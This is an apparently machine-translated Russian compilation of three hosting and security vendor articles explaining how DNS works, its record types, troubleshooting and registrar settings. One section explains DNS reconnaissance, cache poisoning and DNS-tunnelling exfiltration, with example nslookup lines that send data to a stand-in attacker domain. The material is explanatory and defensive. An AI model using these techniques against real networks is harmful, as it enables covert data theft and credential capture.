Dns как работает: Как работает dns — Энциклопедия хостинга

Что такое DNS?

DNS означает D omain N ame S ystem ( DNS ).Когда мы получаем доступ к веб-сайту, мы используем эту службу, чтобы найти сервер, на котором расположен веб-сайт домена. При просмотре веб-страниц мы обычно вводим доменное имя, например www.google.com, в наш браузер. Это лучше, чем пытаться запомнить IP-адрес, связанный с сервером Google.

За кулисами с помощью этой службы происходит преобразование, которое преобразует www. google.com в 172.217.12.46. IP-адрес обозначает расположение сервера в Интернете. Этот процесс преобразования называется запросом.Это неотъемлемая часть того, как устройства подключаются друг к другу для связи через Интернет. Чтобы понять процесс запроса, давайте рассмотрим, как он работает.

Как работает процесс DNS?

Давайте посетим веб-сайт, введя имя домена в веб-браузере. Наш компьютер начнет распознавать имя хоста, например www.liquidweb.com. Затем наш компьютер будет искать IP-адрес, связанный с доменным именем, в своем локальном кэше DNS.В этом кэше хранится информация, которую наш компьютер недавно сохранил. Если он присутствует локально, то веб-сайт будет отображаться. Если наш компьютер не имеет информации, он выполнит DNS-запрос для получения правильной информации.

Если информации нет в локальном кэше вашего компьютера, он запросит другой сервер. Рекурсивные DNS-серверы имеют свой локальный кеш, как и ваш компьютер. Многие интернет-провайдеры используют одни и те же рекурсивные DNS-серверы, возможно, общее доменное имя уже находится в их кеше.Если домен кэширован, запрос на этом завершится и веб-сайт будет отображаться для пользователя.

Если рекурсивный DNS-сервер или серверы не имеют информации, хранящейся в их кэш-памяти, он ищет в другом месте. Затем запрос продолжается по цепочке авторитетных DNS-серверов. Поиск будет продолжаться до тех пор, пока не будет найден сервер имен для домена. Эти официальные серверы имен несут ответственность за хранение этих записей для своих соответствующих доменных имен.

Чтобы найти IP-адрес для liquidweb.com, мы запросим у официального сервера имен запись адреса (запись A). Рекурсивный DNS-сервер обращается к записи A для liquidweb.com с авторитетных серверов имен. Затем он сохраняет запись в своем локальном кеше. Если другой запрос запрашивает запись A для liquidweb.com, рекурсивный сервер получит ответ. Все записи DNS имеют значение времени жизни, которое показывает, когда истечет срок действия записи.По прошествии некоторого времени рекурсивный DNS-сервер запросит обновленную копию записей.

Рекурсивный DNS-сервер имеет информацию и возвращает A-запись на ваш компьютер. Затем наш компьютер сохраняет запись в своем локальном кэше. Он считывает IP-адрес из записи DNS и передает его нашему браузеру. Веб-браузер подключится к веб-серверу, связанному с IP-адресом A-записей, и отобразит веб-сайт.

Весь процесс поиска, от начала до конца, занимает всего миллисекунды.Для лучшего понимания давайте разберем компоненты, составляющие процесс поиска.

DNS-серверы

Авторитетный сервер имен — это сервер, на котором хранятся записи DNS (A, CNAME, MX, TXT и т. Д.) Для доменных имен. Эти серверы будут отвечать только на запросы локально сохраненных файлов зоны DNS. Скажем, сервер в нашей сети сохранил запись A для example.com. Этот сервер является официальным сервером для доменного имени example.com.

Рекурсивный сервер имен — это DNS-сервер, который принимает запросы в информационных целях. Эти типы серверов не хранят записи DNS. Когда запрос получен, он будет искать в кэш-памяти адрес, связанный с IP-адресом. Если рекурсивный сервер имен имеет информацию, он вернет ответ отправителю запроса. Если записи нет, то запрос будет отправлен на другие рекурсивные серверы имен. Это продолжается до тех пор, пока он не достигнет авторитетного DNS-сервера, который может предоставить IP-адрес.

Зоны DNS

Зона DNS — это административное пространство в системе доменных имен. Зона образует часть пространства имен DNS, делегированную администраторам или определенным объектам. Каждая зона содержит записи ресурсов для всех своих доменных имен.

Файл зоны DNS

Файл зоны DNS — это текстовый файл, хранящийся на сервере. Он содержит все записи для каждого домена в этой зоне. В файле зоны обязательно должен быть указан TTL (время жизни) перед любой другой информацией.TTL определяет, как долго запись DNS находится в кэш-памяти сервера. Файл зоны может содержать только одну запись в строке. Сначала будет отображаться запись Start of Authority (SOA). Запись SOA содержит важную информацию об имени домена, включая основной полномочный сервер имен для зоны DNS.

Типы записей DNS

записей DNS хранятся на официальных серверах. Эти записи предоставляют информацию о домене, включая связанный с ним IP-адрес для каждого домена.Для всех доменов обязательно наличие определенного набора записей по умолчанию. Ниже приведен список наиболее распространенных типов записей и часто используемых записей DNS. Давайте рассмотрим каждый тип записей.

Запись A (адрес)

Запись CNAME (каноническое имя)

MX (почтовый обменник)

Число приоритета справа от MX определяет порядок доступа к почтовым серверам. Как ни странно, чем ниже число, тем выше приоритет. Например, с приоритетом 10, установленным в записи MX, сначала будут получены сообщения электронной почты. Запись MX с приоритетом 20 будет резервной, если запись MX с приоритетом 10 недоступна.

Запись TXT (текст)

Запись NS (сервера имен)

Запись SOA (начало полномочий)

• Имя основного DNS-сервера
• Адрес электронной почты ответственной стороны для этой зоны
• Серийный номер, который используется вторичным DNS-сервером для оценки того, изменилась ли информация, содержащаяся в зоне.
  • Если информация в зоне изменилась на первичном сервере, эти изменения передаются другим DNS-серверам, и это обновляет серийный номер в файле зоны, чтобы указать, что обновление было выполнено.
• Интервал обновления или TTL
  • Это показывает, как часто DNS-серверы проверяют наличие обновлений или изменений любой из записей в соответствии с TTL или временем жизни. Это число можно изменить, чтобы увеличить или уменьшить таймфрейм, когда происходят эти изменения,
• Интервал повтора
  • Интервал повтора показывает, как часто вторичные DNS-серверы должны повторять попытку проверки, внесены ли какие-либо изменения в зону, если первое обновление не удалось.
• Expire Interval
  • Показывает, как долго TTL зоны будет действителен после обновления.
• Минимум (по умолчанию) TTL (время жизни)
  • Записи SOA описаны в https://www.ietf.org/rfc/rfc1035.txt в разделе «Доменные имена — реализация и спецификация».

Запись SRV (служба)

• Имя хоста
• Порты
• Приоритет и вес
• IP-адресов

Вот пример двух записей SRV.

_sip._tcp.example.com. 3600 IN SRV 10 50 5060 serviceone.example.com.
_sip._tcp.example.com. 3600 IN SRV 10 30 5060 servicetwo.example.com.

Примечание. _Sip — это имя службы, а _tcp — транспортный протокол.

Содержимое записи SRV определяет приоритет 10 для обеих записей. Первая запись имеет вес 50, а вторая — 30. Значения приоритета и веса способствуют использованию определенных серверов по сравнению с другими. Последние два значения в записи описывают порт (5060) и имя хоста (serviceone. example.com) для подключения для доступа к любым службам.

Запись PTR (указатель)

Запись PTR (обратная запись DNS) действует противоположно записи A.Он преобразует IP-адрес в доменное имя. Цель этой записи в основном административная. Он проверяет, связан ли IP-адрес с доменным именем. Не все провайдеры DNS-хостинга предлагают этот тип записи.

Устранение неполадок DNS

Теперь, когда мы рассмотрели службы и компоненты DNS, мы можем приступить к устранению проблем с DNS, которые могут возникнуть. Ниже приведен список общих советов по устранению неполадок DNS.

• Если на нашем веб-сайте отображается сообщение «IP-адрес сервера не найден», возможно, запись A отсутствует.Вам нужно будет добавить запись A в вашу зону DNS.

• Проверьте, есть ли у вас неправильно настроенные записи DNS.
• Когда вы меняете свои серверы имен, нам нужно дождаться распространения серверов имен. Распространение может занять от 24 до 48 часов для полного распространения через Интернет.
• Убедитесь, что у вас высокие значения TTL (время жизни). Если запись A имеет значение TTL по умолчанию 86400 секунд (24 часа). Если мы обновим запись A, распространение займет от 24 до 48 часов.Лучше изменить значение TTL на 300 секунд, что составляет 5 минут. У нас есть отличная статья, в которой больше говорится о значениях TTL.
• Если мы используем сторонний прокси-сервер и наш веб-сайт не отображается. Мы можем использовать наш локальный файл хоста, чтобы узнать, где возникает проблема. Наш сайт называется dnswebtest.com. Этот домен использует сторонний прокси-сервер. Если возникает ошибка подключения, мы обычно можем определить, где возникла ошибка. Чтобы найти проблему с хостом или прокси-сервером, мы исследуем ее.Для устранения неполадок мы изменим наш локальный файл хоста. Мы добавляем сайт dnswebtest.com в качестве записи в файл хоста. Затем укажите IP-адрес хостинговой компании, например 98.129.229.4. Если мы посещаем веб-сайт и он отображается правильно, мы знаем, что проблема связана со сторонним прокси-сервером. Вот отличная статья о том, как редактировать файл хоста.

Хотя DNS может быть сложной проблемой, лучше понять процесс всегда полезно. Эти советы по устранению неполадок могут подготовить нас к работе с DNS.Следующие инструменты весьма полезны при проверке распространения DNS или записей.

1. https://www.whatsmydns.net/ для распространения DNS
2. https://www.whoishostingthis.com/, чтобы показать, какой IP-адрес веб-сайт разрешает на

Чем мы можем помочь?

Мы гордимся тем, что являемся самыми полезными людьми в Hosting ™!

Наша группа поддержки состоит из опытных технических специалистов по Linux и талантливых системных администраторов, которые досконально разбираются в различных технологиях веб-хостинга, особенно тех, которые обсуждаются в этой статье.

Если у вас возникнут какие-либо вопросы относительно этой информации, мы всегда готовы ответить на любые запросы по вопросам, связанным с этой статьей, 24 часа в сутки, 7 дней в неделю, 365 дней в году.

Если вы являетесь полностью управляемым сервером VPS, выделенным облаком, частным облаком VMWare, частным родительским сервером, управляемыми облачными серверами или владельцем выделенного сервера, и вам неудобно пытаться изменить любые указанные изменения, с нами можно связаться по телефону @ 800.580.4985, чат или обращение в службу поддержки, чтобы помочь вам в этом процессе.

Что такое DNS, как это работает + уязвимости

Система доменных имен (DNS) — это интернет-версия Желтых страниц. В старину, когда вам нужно было найти адрес компании, вы искали его в желтых страницах. DNS работает точно так же, за исключением того, что вам на самом деле не нужно ничего искать: ваш компьютер, подключенный к Интернету, сделает это за вас. Благодаря ему ваш компьютер может найти Google, ESPN.com или Varonis.com.

Протокол требует, чтобы два компьютера обменивались данными в IP-сети.Подумайте об IP-адресе как об уличном адресе: чтобы один компьютер «нашел» другой, ему нужно знать номер другого компьютера. Поскольку большинство людей лучше запоминают имена — www.varonis.com — чем числа — 104.196.44.111, им нужна была программа для компьютеров, которая переводила бы имена в IP-адреса.

Ненавидите компьютеры в профессиональном плане? Попробуйте карты против ИТ.

Программа для преобразования имен в числа и наоборот называется «DNS» или системой доменных имен, а компьютеры, на которых работает DNS, называются «DNS-серверами.«Без DNS нам пришлось бы запоминать IP-адрес любого сервера, к которому мы хотели подключиться, — неинтересно.

DNS является такой неотъемлемой частью Интернета, что важно понимать, как он работает.

Думайте о DNS как о телефонной книге, но вместо того, чтобы сопоставлять имена людей с их уличными адресами, телефонная книга сопоставляет имена компьютеров с IP-адресами. Каждое сопоставление называется «записью DNS».

В Интернете много компьютеров, поэтому нет смысла собирать все записи в одну большую книгу. Вместо этого DNS организован в виде небольших книг или доменов. Домены могут быть очень большими, поэтому они организованы в более мелкие книги, называемые «зонами». Ни один DNS-сервер не хранит все книги — это было бы непрактично.

Вместо этого существует множество DNS-серверов, которые хранят все записи DNS для Интернета. Любой компьютер, который хочет узнать номер или имя, может запросить свой DNS-сервер, а его DNS-сервер знает, как запрашивать — или запрашивать — другие DNS-серверы, когда им нужна запись. Когда DNS-сервер запрашивает другие DNS-серверы, он делает «восходящий» запрос.Запросы для домена могут идти «вверх по течению», пока не вернутся к полномочиям домена или «авторитетному серверу имен».

Авторитетный сервер имен — это то место, где администраторы управляют именами серверов и IP-адресами своих доменов. Всякий раз, когда администратор DNS хочет добавить, изменить или удалить имя сервера или IP-адрес, он вносит изменения на свой полномочный DNS-сервер (иногда называемый «главным DNS-сервером»). Также существуют «подчиненные» DNS-серверы; эти DNS-серверы содержат копии DNS-записей для своих зон и доменов.

Четыре DNS-сервера, загружающие веб-страницу

• DNS-рекурсор: DNS-рекурсор — это сервер, который отвечает на DNS-запрос и запрашивает адрес у другого DNS-сервера или уже имеет сохраненный IP-адрес для сайта.
• Корневой сервер имен : корневой сервер имен — это сервер имен для корневой зоны. Он отвечает на прямые запросы и может возвращать список авторитетных серверов имен для соответствующего домена верхнего уровня.
• Сервер имен TLD: Сервер домена верхнего уровня (TLD) является одним из DNS-серверов высокого уровня в Интернете.При поиске www.varonis.com сначала ответит сервер TLD для домена .com, а затем DNS выполнит поиск по запросу varonis.
• Авторитетный сервер имен: Авторитетный сервер имен является последней остановкой для DNS-запроса. Официальный сервер имен имеет DNS-запись для запроса.

Типы службы DNS

В Интернете есть два различных типа DNS-сервисов. Каждая из этих служб обрабатывает запросы DNS по-разному в зависимости от их функции.

• Рекурсивный преобразователь DNS: Рекурсивный преобразователь DNS — это DNS-сервер, который отвечает на запрос DNS и ищет авторитетный сервер имен или кэшированный результат DNS для запрошенного имени.
• Авторитетный DNS-сервер: Авторитетный DNS-сервер хранит DNS-запрос. Поэтому, если вы запрашиваете у полномочного DNS-сервера один из его IP-адресов, ему не нужно спрашивать никого другого. Авторитетный сервер имен является последней инстанцией для этих имен и IP-адресов.

Общедоступный DNS и частный DNS

DNS был создан, чтобы люди могли подключаться к услугам в Интернете. Чтобы сервер был доступен в общедоступном Интернете, ему необходима общедоступная DNS-запись, а его IP-адрес должен быть доступен в Интернете — это означает, что он не заблокирован брандмауэром. Публичные DNS-серверы доступны всем, кто может к ним подключиться, и не требуют аутентификации.

Интересно, что не все записи DNS являются общедоступными. Сегодня, помимо того, что сотрудники могут использовать DNS для поиска вещей в Интернете, организации используют DNS, чтобы их сотрудники могли находить частные внутренние серверы.Когда организация хочет, чтобы имена серверов и IP-адреса оставались конфиденциальными или недоступными напрямую из Интернета, они не перечисляют их на общедоступных DNS-серверах. Вместо этого организации перечисляют их на частных или внутренних DNS-серверах — внутренние DNS-серверы хранят имена и IP-адреса для внутренних файловых серверов, почтовых серверов, контроллеров домена, серверов баз данных, серверов приложений и т. Д. — всего важного.

Что нужно запомнить — как и внешние DNS-серверы, внутренние DNS-серверы не требуют аутентификации.Это потому, что DNS был создан давно, когда безопасность не была такой большой проблемой. В большинстве случаев любой, кто находится внутри брандмауэра — путем проникновения или подключения через VPN — может запрашивать внутренние DNS-серверы. Единственное, что мешает кому-либо «извне» получить доступ и запросить внутренние DNS-серверы, — это то, что они не могут подключиться к ним напрямую.

• Общедоступный DNS: Чтобы сервер был доступен в общедоступном Интернете, ему нужна общедоступная запись DNS, а его IP-адрес должен быть доступен в Интернете.
• Частный DNS : компьютеры, которые находятся за брандмауэром или во внутренней сети, используют частную запись DNS, чтобы локальные компьютеры могли идентифицировать их по имени. Сторонние пользователи Интернета не будут иметь прямого доступа к этим компьютерам.

7 шагов поиска DNS

Давайте посмотрим, как именно работает DNS-запрос.

1. DNS-запрос запускается при попытке доступа к компьютеру в Интернете . Например, вы набираете www.varonis.com в адресной строке браузера.
2. Первая остановка для DNS-запроса — это локальный DNS-кеш. При доступе к разным компьютерам эти IP-адреса сохраняются в локальном репозитории. Если вы ранее заходили на сайт www.varonis.com, у вас есть IP-адрес в кэше.
3. Если у вас нет IP-адреса в локальном кэше DNS, DNS проверит его с помощью рекурсивного DNS-сервера. Ваша ИТ-группа или поставщик услуг Интернета (ISP) обычно предоставляет для этой цели рекурсивный DNS-сервер.
4. У рекурсивного DNS-сервера есть собственный кеш, и если у него есть IP-адрес, он вернет его вам. Если нет, он спросит другой DNS-сервер.
5. Следующая остановка — это серверы имен TLD, в данном случае сервер имен TLD для адресов .com. У этих серверов нет нужного нам IP-адреса, но они могут отправить DNS-запрос в правильном направлении.
6. Что есть у серверов имен TLD, так это расположение официального сервера имен для запрашиваемого сайта. Официальный сервер имен отвечает IP-адресом для www.varonis.com, а рекурсивный DNS-сервер сохраняет его в локальном кэше DNS и возвращает адрес на ваш компьютер.
7. Ваша местная служба DNS получает IP-адрес и подключается к www.varonis.com для загрузки всего великолепного контента. DNS затем записывает IP-адрес в локальный кеш со значением времени жизни (TTL). TTL — это время, в течение которого локальная запись DNS действительна, и после этого времени DNS снова выполнит процесс, когда вы запросите Varonis.com в следующий раз.

Какие типы DNS-запросов?

DNS-запросы — это компьютерный код, который сообщает DNS-серверам, что это за запрос и какую информацию он хочет получить обратно. В стандартном поиске DNS есть три основных DNS-запроса.

• Рекурсивный запрос: В рекурсивном запросе компьютер запрашивает IP-адрес или подтверждение того, что DNS-сервер не знает этот IP-адрес.

• Итеративный запрос: Итеративный запрос, который запрашивающая сторона запрашивает у DNS-сервера лучший ответ, который у него есть.Если DNS-сервер не имеет IP-адреса, он вернет авторитетный сервер имен или сервер имен TLD. Запрашивающая сторона будет продолжать этот итеративный процесс до тех пор, пока не найдет ответ или не истечет время ожидания.

• Нерекурсивный запрос: Преобразователь DNS будет использовать этот запрос для поиска IP-адреса, которого нет в его кэше. Они ограничены одним запросом на ограничение использования полосы пропускания сети.

Что такое DNS-кэш + функции кеширования

DNS — это хранилище доменных имен и IP-адресов, которые хранятся на компьютере, поэтому ему не нужно каждый раз запрашивать IP-адрес.Представьте, что каждый раз, когда какой-либо пользователь пытается перейти на www.varonis.com, DNS должен запрашивать авторитетный сервер имен в Varonis. Трафик будет огромным! Сама мысль о таком большом трафике — вот почему у нас есть кеширование DNS. Кэширование DNS преследует две основные цели:

• Ускорение DNS-запросов
• Уменьшить пропускную способность DNS-запросов в Интернете

Однако методология кеширования DNS имеет некоторые проблемы:

• Изменениям DNS требуется время для распространения — это означает, что может пройти некоторое время, прежде чем каждый DNS-сервер обновит свой кеш до последних данных IP
• DNS-кеш — потенциальный вектор атаки для хакеров

В Интернете используется несколько различных типов кэширования DNS:

• Кэширование DNS в браузере: Текущие браузеры примерно на 2018 год имеют встроенную функцию кэширования DNS. Разрешение DNS с помощью локального кеша выполняется быстро и эффективно.
• Операционная система (ОС) Кэширование DNS: Ваш компьютер является DNS-клиентом, и на вашем компьютере есть служба, которая управляет разрешением и запросами DNS. Этот DNS-кеш также является локальным и поэтому быстрый и не требует полосы пропускания.
• Рекурсивное разрешение кэширования DNS: Каждый рекурсор DNS имеет кеш DNS и хранит любой IP-адрес, который он знает для использования для следующего запроса

Слабые стороны и уязвимости DNS

Существует три основных уязвимости DNS, на которые следует обратить внимание, которые злоумышленники часто используют для злоупотребления DNS:

1. Внутренние DNS-серверы хранят все имена серверов и IP-адреса для своих доменов и будут делиться ими со всеми, кто их спросит. Это делает DNS отличным источником информации для злоумышленников, когда они пытаются провести внутреннюю разведку.
2. Кеши DNS не являются «авторитетными», и ими можно манипулировать. Если ваш DNS-сервер «отравлен» плохими записями, компьютеры могут быть обмануты и они попадут в плохие места.
3. DNS передает информацию запроса от внутренних рабочих станций к внешним серверам, и злоумышленники научились использовать это поведение для создания «скрытых каналов» для эксфильтрации данных.

Использовать DNS для разведки

Как только злоумышленник находится внутри брандмауэра и получает контроль над компьютером, он может использовать DNS для поиска важных имен серверов. Злоумышленники могут искать имена, связанные с внутренними IP-адресами — почтовые серверы, серверы имен — все виды ценных вещей. Если они достаточно сообразительны, они могут даже получить внутренний DNS-сервер для отправки большого количества информации о зонах их домена — это называется «атакой передачи зоны DNS».”

Если у вас компьютер Windows, выполните следующие команды как есть; если вы пользователь Linux, вы можете найти соответствующие команды.

1. Откройте командную строку (введите Ctrl + esc, буквы «cmd», затем введите).
2. Тип ipconfig
3. Вы увидите DNS-домен, в котором вы находитесь (DNS-суффикс для конкретного подключения), ваш IP-адрес и множество других вещей. Вы захотите вернуться к этому.
4. Введите nslookup [ip-адрес] Вы увидите имя DNS-сервера, который отвечает, и, если имя известно, DNS-запись с указанием имени и IP-адреса.
5. nslookup –type = soa [ваш домен] Эта команда возвращает ваш авторитетный DNS-сервер, это не поможет, если вы пытаетесь проникнуть в сеть.
6. nslookup –type = MX [ваш домен] Эта команда возвращает все почтовые серверы в вашем локальном домене на случай, если вы хотите взломать почтовые серверы и не знаете, где они находятся.

Использовать DNS для перенаправления трафика

Помните, когда пользователь пытается перейти на веб-сайт, его компьютер запрашивает у своего DNS-сервера IP-адрес сайта или DNS-запись. Если DNS-сервер имеет кэшированную копию записи, он отвечает. Если нет, он запрашивает «вышестоящий» DNS-сервер, передает результаты обратно конечному пользователю и кэширует их для следующего раза.

Злоумышленники придумали способ подделать ответы DNS или создать впечатление, что они исходят от законных серверов DNS. Не вдаваясь в технические подробности, злоумышленники используют для этого три слабых места в DNS:

1. DNS выполняет очень слабую проверку ответов, поступающих от вышестоящих серверов. Ответы просто должны содержать правильный идентификатор транзакции, который представляет собой всего лишь 16-битное число (0-65536). Оказывается, что вам не нужно столько людей в комнате, чтобы получить преимущество у двоих из них, имеющих один и тот же день рождения, оказывается, что угадать правильный идентификатор легче, чем вы думаете.
2. DNS-серверы принимают одновременные (или почти одновременные) ответы на свои запросы , что позволяет злоумышленникам делать несколько предположений об идентификаторе транзакции (что мало похоже на атаку грубой силы на пароль).
3. IP-соединения, используемые DNS, легко подделать. Это означает, что злоумышленник может отправить трафик на DNS-сервер с одного компьютера и сделать так, чтобы он выглядел так, как будто он идет с другого компьютера, как действительный DNS-сервер. Только определенные типы IP-соединений легко подделать — DNS является одним из них.

Если злоумышленник успешно подделывает ответ DNS, он может заставить принимающий DNS-сервер кэшировать зараженную запись. Так как это поможет злоумышленникам?

Вот пример. Допустим, злоумышленник узнает, что ваша организация использует внешнее приложение для чего-то важного, например для расходов.Если они отравляют DNS-сервер вашей организации и отправляет каждого пользователя на сервер злоумышленника, все, что им нужно сделать, это создать легитимную страницу входа в систему, и пользователи будут вводить свои учетные данные. Они могут даже ретранслировать трафик на настоящий сервер (действуя как «человек посередине»), чтобы никто не заметил. Затем злоумышленник может попробовать эти учетные данные в других системах, продать их или просто отпраздновать это злобным смехом.

Использование DNS в качестве скрытого канала

Допустим, злоумышленник сумел проникнуть в сеть (корп.com), скомпрометировали один или два хоста и обнаружили важные данные, которые они хотят эксфильтровать. Как они могут сделать это, не подавая никаких сигналов тревоги? Для этого злоумышленники используют метод, называемый «DNS-туннелирование». Они настраивают DNS-домен (например, evil-domain.com) в Интернете и создают авторитетный сервер имен. Затем на взломанном хосте злоумышленник может использовать программу, которая разбивает данные на небольшие части и вставляет их в серию запросов, например:

• nslookup My1secret1.evil-domain.com
• nslookup is1that1I1know.evil-domain.com
• nsllookup how2steal1data.evil-domain.com

DNS-сервер corp.com получит эти запросы, поймет, что результатов нет в его кеше, и ретранслирует эти запросы обратно на авторитетный сервер имен evil-domain. com. Злоумышленник ожидает этот трафик, поэтому он запускает программу на полномочном сервере имен, чтобы извлечь первую часть запроса (все до evil-domain.com) и собрать ее заново.Если организация не проверяет запросы своих DNS-серверов, они могут никогда не понять, что их DNS-серверы использовались для эксфильтрации данных.

DNS существует уже давно, и каждый компьютер, подключенный к Интернету, полагается на него. Злоумышленники теперь используют DNS как для внешней, так и для внутренней разведки, для перехвата трафика и создания скрытых каналов связи. К счастью, с помощью мониторинга DNS-серверов и применения аналитики безопасности многие из этих атак могут быть обнаружены и предотвращены.

Хотите увидеть, как? Присоединяйтесь к нашим семинарам по кибератакам в режиме реального времени, когда наши инженеры по безопасности проводят живую атаку, извлекают данные через туннелирование DNS и просматривают все в реальном времени!

Что такое DNS? и как работает DNS? (Объяснено для начинающих)

DNS означает «Система доменных имен». Это система, которая позволяет подключаться к веб-сайтам, сопоставляя удобочитаемые доменные имена (например, wpbeginner.com) с уникальным идентификатором сервера, на котором хранится веб-сайт.

Думайте о системе DNS как о телефонной книге Интернета.В нем перечислены доменные имена с соответствующими идентификаторами, называемыми IP-адресами, вместо того, чтобы перечислять имена людей с их номерами телефонов. Когда пользователь вводит доменное имя, такое как wpbeginner.com, на своем устройстве, он ищет IP-адрес и подключает его к физическому месту, где хранится этот веб-сайт.

Как работает DNS?

Интернет — это гигантская сеть компьютеров. Каждому устройству, подключенному к Интернету, назначается уникальный IP-адрес, который помогает другим компьютерам идентифицировать его.

Этот IP-адрес представляет собой строку чисел с точками, которая выглядит следующим образом: 192.124.249.166

А теперь представьте, если бы вам пришлось запоминать такие длинные строки чисел, чтобы посещать ваши любимые веб-сайты. Их сложно запомнить, и они ничего не говорят вам о веб-сайте, который вы увидите, если введете их в браузер.

Доменные имена были изобретены для решения этой проблемы с использованием алфавитов и позволяющих пользователям выбирать легко запоминающиеся имена для своих веб-сайтов.

DNS или система доменных имен в основном переводит эти доменные имена в IP-адреса и направляет ваше устройство в правильном направлении.

Доменное имя и соответствующий ему IP-адрес называется «записью DNS».

Вот простой способ понять, как работает DNS, в четыре этапа.

Предположим, вы хотите посетить наш сайт www.wpbeginner.com.

1. Вы открываете браузер, набираете www.wpbeginner.com в адресной строке и нажимаете Enter на клавиатуре. Сразу же происходит быстрая проверка, посещали ли вы наш сайт ранее.

Если записи DNS находятся в кэше DNS вашего компьютера, то остальная часть поиска DNS пропускается, и вы будете перенаправлены непосредственно на www. wpbeginner.com.

2. Если DNS-записи не найдены, то на ваш локальный DNS-сервер отправляется запрос. Обычно это сервер вашего интернет-провайдера, который часто называют «разрешающим сервером имен».

3. Если записи не кэшируются на разрешающем сервере имен, то запрос перенаправляется на так называемый «корневой сервер имен» для поиска записей DNS. Корневые серверы имен — это назначенные серверы по всему миру, которые отвечают за хранение данных DNS и обеспечение бесперебойной работы системы.Как только DNS-запись обнаружена на корневом сервере имен, она кэшируется на вашем компьютере.

4. Теперь, когда записи DNS найдены, будет открыто соединение с сервером, на котором хранится веб-сайт, и на вашем экране отобразится www.wpbeginner.com.

Подробнее читайте в нашем руководстве для начинающих о том, как работают доменные имена.

Что такое сервер имен?

Доступ в Интернет возможен благодаря сети компьютеров, называемых серверами. Сервер — это тип компьютера, предназначенный для хранения и доставки веб-сайтов на другие компьютеры по всему миру.

Сервер имен, иногда называемый «сервером имен», — это особый тип сервера, который хранит все записи DNS вашего доменного имени. Его задача — предоставлять информацию о вашем DNS любому, кто ее запрашивает.

обычно управляются вашим регистратором доменных имен или хостинг-провайдером.

Каждый сервер имен имеет свой собственный адрес и может хранить записи многих веб-сайтов. Например, если ваш веб-сайт размещен на Bluehost, то сервер имен, используемый для управления вашими записями DNS, будет находиться на серверах имен с адресами, которые выглядят следующим образом:

NS1.bluehost.com
NS2.bluehost.com
NS3.bluehost.com

Каждое доменное имя должно иметь как минимум два сервера имен. Первый сервер имен — это первичный сервер. Если первичный сервер не отвечает, то вторичный сервер имен используется для разрешения имени домена.

Некоторые хостинг-провайдеры WordPress также позволяют пользователям получать свои собственные частные серверы имен. Например, в WPBeginner мы используем собственный частный сервер имен.

NS0.WPBEGINNER.COM
NS1.WPBEGINNER.COM
NS2.WPBEGINNER.COM
NS3.WPBEGINNER.COM
NS4.WPBEGINNER.COM

Как изменить серверы имен

Самое лучшее в системе DNS — это то, что она позволяет владельцам веб-сайтов перемещать свои веб-сайты без изменения их доменных имен.

Лучшие регистраторы доменов обычно предоставляют владельцам доменов простые инструменты для управления своими серверами имен.

В идеале было бы лучше, если бы вы зарегистрировали свой домен у своего хостинг-провайдера. Использование собственного хостинг-провайдера исключает перенос доменного имени или смену серверов имен.

Если ваше доменное имя зарегистрировано у одного провайдера, а ваш веб-сайт размещен в другом месте, вы можете просто изменить DNS-серверы имен и указать свой веб-хост.

Например, если ваше доменное имя зарегистрировано на Domain.com, а ваш веб-сайт размещен в одной из популярных хостинговых компаний WordPress, вы можете легко изменить свои серверы имен.

Некоторые провайдеры хостинга WordPress могут предлагать cPanel для управления вашей учетной записью хостинга. Мы будем использовать Domain.com, чтобы показать вам, как редактировать записи DNS:

Сначала войдите в домен.com, затем щелкните Управление .

Затем выберите DNS и Серверы имен в левом меню.

Затем выберите имя домена и щелкните 3 точки в правой части экрана.

Теперь отредактируйте серверы имен, нажав Edit .

Затем введите свой сервер имен в соответствующее поле.

Наконец, нажмите Отправить изменения , и все готово.

Если у вас нет учетной записи Domain.com, вы можете изменить серверы имен в своем веб-хосте или учетной записи регистратора. Если вы не можете найти, как их изменить, посетите страницы поддержки своего регистратора доменов или отправьте им электронное письмо.

Что такое запись CNAME?

CNAME означает каноническое имя. Запись CNAME — это тип записи DNS, которая используется для указания имени домена на другое имя домена вместо IP-адреса.

Например, вы хотите убедиться, что ваш веб-сайт является примером.com, но вы также зарегистрировали examples.com и хотите, чтобы он перешел на ваш основной веб-сайт.

В этом случае вы можете настроить запись CNAME, чтобы любой, кто посещает example.com, переходил на example.com.

Как добавить запись CNAME

Добавление записи CNAME полезно, если вы собираетесь настроить свой домен для использования фирменной электронной почты, такой как Outlook.com, или настроить учетную запись электронной почты с фирменной символикой в ​​G Suite и Gmail.

Чтобы добавить запись CNAME, войдите в свой домен.com выберите Manage , затем на следующем экране нажмите DNS and Nameservers »Add DNS Record .

Затем отредактируйте запись CNAME, щелкнув три точки рядом с записью, которую вы хотите изменить, и щелкните Изменить .

Затем выберите CNAME из раскрывающегося меню справа. Введите информацию в соответствующие поля.

После ввода необходимой информации нажмите кнопку Добавить DNS , и все готово.

Если вы не видите настройки того, как изменить запись CNAME в своей учетной записи хостинга, спросите своего хостинг-провайдера, и он сможет вам помочь.

Что такое запись MX?

MX-запись — это сокращение от записи Mail Exchanger. Это еще один тип DNS-записи, определяющий почтовый сервер для обработки электронной почты для определенного доменного имени.

Например, добавив запись MX, предоставленную Outlook.com для your-domain.com, любое электронное письмо, полученное на your-domain.com будет обрабатываться через почтовые серверы Outlook. com.

Как добавить запись MX

Добавить запись MX очень просто. Мы покажем вам, как добавить запись MX к вашему доменному имени с помощью Domain.com.

Сначала войдите в свою учетную запись Domain.com и выберите Manage , затем на следующей странице выберите DNS и Nameservers .

Затем нажмите синюю кнопку Добавить запись DNS .

Затем выберите запись MX из списка, который вы хотите отредактировать, и нажмите на три точки справа.

Теперь внесите изменения в запись MX и нажмите Обновить DNS , и все готово.

Если вы не видите настройки изменения записей MX в своей учетной записи хостинга, попросите своего хостинг-провайдера показать вам, как добавить запись MX.

Что такое запись TXT?

Запись TXT — это еще один тип записи ресурса DNS. Записи TXT могут иметь записи SPF (Sender Policy Framework) и DKIM (Domain Key Identified Mail), которые добавляют зашифрованный ключ в исходящую почту.

Эта информация улучшает доставку вашей электронной почты за счет добавления уровня доверия к вашему почтовому серверу.

Как добавить запись TXT

записей TXT полезны, когда вы используете стороннюю почтовую службу, такую ​​как G Suite или Outlook.com, на собственном доменном имени. Мы покажем вам, как добавить запись TXT в настройки записей DNS с помощью Domain.com.

Сначала войдите в свою учетную запись Domain.com и нажмите Manage , затем на следующей странице нажмите DNS и Nameservers .

Затем нажмите синюю кнопку Добавить запись DNS .

Затем прокрутите вниз, пока не увидите записи TXT, и нажмите на 3 точки справа.

Наконец, внесите изменения в запись TXT и нажмите Обновить DNS .

